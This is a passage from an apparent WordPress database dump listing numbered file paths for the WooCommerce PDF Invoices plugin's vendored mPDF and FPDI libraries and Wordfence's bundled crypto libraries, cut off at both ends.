land.php'),(5615,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Frisian_Netherlands.php'),(5616,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Galician_Spain.php'),(5617,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/German_Austria.php'),(5618,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/German_Germany.php'),(5619,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/German_Liechtenstein.php'),(5620,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/German_Luxembourg.php'),(5621,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/German_Switzerland.php'),(5622,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Greek_Greece.php'),(5623,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Greenlandic_Greenland.php'),(5624,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Hausa_(Latin)_Nigeria.php'),(5625,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Hebrew_Israel.php'),(5626,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Hungarian_Hungary.php'),(5627,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Icelandic_Iceland.php'),(5628,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Igbo_Nigeria.php'),(5629,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Indonesian_Indonesia.php'),(5630,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Inuktitut_(Latin)_Canada.php'),(5631,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Invariant_Language_Invariant_Country.php'),(5632,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Irish_Ireland.php'),(5633,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Italian_Italy.php'),(5634,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Italian_Switzerland.php'),(5635,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Kinyarwanda_Rwanda.php'),(5636,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Kiswahili_Kenya.php'),(5637,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Kyrgyz_Kyrgyzstan.php'),(5638,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Latvian_Latvia.php'),(5639,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Lithuanian_Lithuania.php'),(5640,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Lower_Sorbian_Germany.php'),(5641,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Luxembourgish_Luxembourg.php'),(5642,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Macedonian_(FYROM)_Macedonia_(FYROM).php'),(5643,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Malay_Brunei_Darussalam.php'),(5644,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Malay_Malaysia.php'),(5645,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Mapudungun_Chile.php'),(5646,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Mohawk_Canada.php'),(5647,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Mongolian_(Cyrillic)_Mongolia.php'),(5648,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Norwegian_(Nynorsk)_Norway.php'),(5649,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Occitan_France.php'),(5650,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Persian_Iran.php'),(5651,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Polish_Poland.php'),(5652,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Portuguese_Brazil.php'),(5653,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Portuguese_Portugal.php'),(5654,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Quechua_Bolivia.php'),(5655,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Quechua_Ecuador.php'),(5656,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Quechua_Peru.php'),(5657,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Romanian_Romania.php'),(5658,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Romansh_Switzerland.php'),(5659,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Russian_Russia.php'),(5660,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Inari)_Finland.php'),(5661,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Lule)_Norway.php'),(5662,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Lule)_Sweden.php'),(5663,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Northern)_Finland.php'),(5664,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Northern)_Norway.php'),(5665,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Northern)_Sweden.php'),(5666,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Skolt)_Finland.php'),(5667,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Southern)_Norway.php'),(5668,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Southern)_Sweden.php'),(5669,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Serbian_(Cyrillic)_Bosnia_and_Herzegovina.php'),(5670,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Serbian_(Cyrillic)_Serbia.php'),(5671,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Serbian_(Latin)_Bosnia_and_Herzegovina.php'),(5672,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Serbian_(Latin)_Serbia.php'),(5673,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sesotho_sa_Leboa_South_Africa.php'),(5674,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Setswana_South_Africa.php'),(5675,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Slovak_Slovakia.php'),(5676,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Slovenian_Slovenia.php'),(5677,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Argentina.php'),(5678,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Bolivia.php'),(5679,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Chile.php'),(5680,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Colombia.php'),(5681,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Costa_Rica.php'),(5682,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Dominican_Republic.php'),(5683,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Ecuador.php'),(5684,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_El_Salvador.php'),(5685,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Guatemala.php'),(5686,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Honduras.php'),(5687,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Mexico.php'),(5688,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Nicaragua.php'),(5689,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Panama.php'),(5690,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Paraguay.php'),(5691,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Peru.php'),(5692,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Puerto_Rico.php'),(5693,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Spain.php'),(5694,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_United_States.php'),(5695,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Uruguay.php'),(5696,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Venezuela.php'),(5697,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Swedish_Finland.php'),(5698,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Swedish_Sweden.php'),(5699,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Tajik_(Cyrillic)_Tajikistan.php'),(5700,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Tamazight_(Latin)_Algeria.php'),(5701,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Tatar_Russia.php'),(5702,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Turkish_Turkey.php'),(5703,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Turkmen_Turkmenistan.php'),(5704,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Ukrainian_Ukraine.php'),(5705,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Upper_Sorbian_Germany.php'),(5706,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Urdu_Islamic_Republic_of_Pakistan.php'),(5707,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Uzbek_(Cyrillic)_Uzbekistan.php'),(5708,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Uzbek_(Latin)_Uzbekistan.php'),(5709,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Vietnamese_Vietnam.php'),(5710,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Welsh_United_Kingdom.php'),(5711,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Wolof_Senegal.php'),(5712,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Yakut_Russia.php'),(5713,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Yoruba_Nigeria.php'),(5714,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/isiXhosa_South_Africa.php'),(5715,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/isiZulu_South_Africa.php'),(5716,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/composer.json'),(5717,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/compress.php'),(5718,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/config.php'),(5719,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/config_fonts-distr-without-OTL.php'),(5720,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/config_fonts.php'),(5721,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/config_lang2fonts.php'),(5722,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/config_script2lang.php'),(5723,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ccourier.php'),(5724,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ccourierb.php'),(5725,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ccourierbi.php'),(5726,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ccourieri.php'),(5727,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/chelvetica.php'),(5728,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/chelveticab.php'),(5729,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/chelveticabi.php'),(5730,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/chelveticai.php'),(5731,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/csymbol.php'),(5732,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ctimes.php'),(5733,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ctimesb.php'),(5734,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ctimesbi.php'),(5735,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ctimesi.php'),(5736,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/czapfdingbats.php'),(5737,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/graph.php'),(5738,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/graph_cache/.gitignore'),(5739,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/iccprofiles/sRGB_IEC61966-2-1.icc'),(5740,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/CJKdata.php'),(5741,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/functions.php'),(5742,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/linebrdictK.dat'),(5743,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/linebrdictL.dat'),(5744,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/linebrdictT.dat'),(5745,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/no_image.jpg'),(5746,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/out.php'),(5747,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/subs_core.php'),(5748,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/subs_win-1252.php'),(5749,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/upperCase.php'),(5750,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/lang2fonts.css'),(5751,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/mpdf.css'),(5752,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/mpdf.php'),(5753,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/NOTES.txt'),(5754,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/de.php'),(5755,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/dictionary.txt'),(5756,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/en.php'),(5757,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/es.php'),(5758,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/fi.php'),(5759,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/fr.php'),(5760,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/it.php'),(5761,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/nl.php'),(5762,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/pl.php'),(5763,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/ru.php'),(5764,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/sv.php'),(5765,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/phpunit.xml'),(5766,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/progbar.css'),(5767,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tests/MPDITest.php'),(5768,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tests/WriteHtmlTest.php'),(5769,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tests/bootstrap.php'),(5770,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tests/data/pdfs/2-Page-PDF_1_4.pdf'),(5771,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tests/mPDFTest.php'),(5772,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tmp/.gitignore'),(5773,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfontdata/.gitignore'),(5774,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/DejaVuSansCondensed-Bold.ttf'),(5775,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/DejaVuSansCondensed-Oblique.ttf'),(5776,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/DejaVuSansCondensed.ttf'),(5777,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/Garuda-Bold.ttf'),(5778,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/Garuda-Oblique.ttf'),(5779,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/Garuda.ttf'),(5780,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/SimSun.ttf'),(5781,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/UnBatang_0613.ttf'),(5782,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/XB Riyaz.ttf'),(5783,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/XB RiyazBd.ttf'),(5784,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/XB RiyazIt.ttf'),(5785,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/UnicodeData.txt'),(5786,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/UnicodeRanges.php'),(5787,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/font_collections.php'),(5788,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/font_coverage.php'),(5789,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/font_dump.php'),(5790,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/font_dump_OTL.php'),(5791,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/font_names.php'),(5792,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/image_details.php'),(5793,'wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/index.php'),(5794,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/LICENSE'),(5795,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/README.md'),(5796,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/composer.json'),(5797,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/filters/FilterASCII85.php'),(5798,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/filters/FilterASCIIHexDecode.php'),(5799,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/filters/FilterLZW.php'),(5800,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/fpdf_tpl.php'),(5801,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/fpdi.php'),(5802,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/fpdi_bridge.php'),(5803,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/fpdi_pdf_parser.php'),(5804,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/pdf_context.php'),(5805,'wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/pdf_parser.php'),(5806,'wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/.gitignore'),(5807,'wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/LICENSE'),(5808,'wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/README.md'),(5809,'wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/composer.json'),(5810,'wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/lib/xrstf/Composer52/AutoloadGenerator.php'),(5811,'wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/lib/xrstf/Composer52/ClassLoader.php'),(5812,'wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/lib/xrstf/Composer52/Generator.php'),(5813,'wp-content/plugins/wordfence/crypto/vendor/autoload.php'),(5814,'wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php'),(5815,'wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE'),(5816,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php'),(5817,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php'),(5818,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php'),(5819,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php'),(5820,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php'),(5821,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php'),(5822,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.json'),(5823,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE'),(5824,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey'),(5825,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc'),(5826,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php'),(5827,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php'),(5828,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php'),(5829,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php'),(5830,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php'),(5831,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php'),(5832,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php'),(5833,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php'),(5834,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php'),(5835,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php'),(5836,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE'),(5837,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php'),(5838,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php'),(5839,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php'),(5840,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php'),(5841,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php'),(5842,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php'),(5843,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php'),(5844,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php'),(5845,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php'),(5846,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(5847,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(5848,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php'),(5849,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(5850,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(5851,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(5852,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(5853,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(5854,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(5855,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php'),(5856,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php'),(5857,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php'),(5858,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php'),(5859,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php'),(5860,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php'),(5861,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php'),(5862,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php'),(5863,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php'),(5864,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php'),(5865,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php'),(5866,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php'),(5867,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php'),(5868,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php'),(5869,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php'),(5870,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php'),(5871,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php'),(5872,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php'),(5873,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(5874,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php'),(5875,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php'),(5876,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(5877,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(5878,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(5879,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(5880,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Cur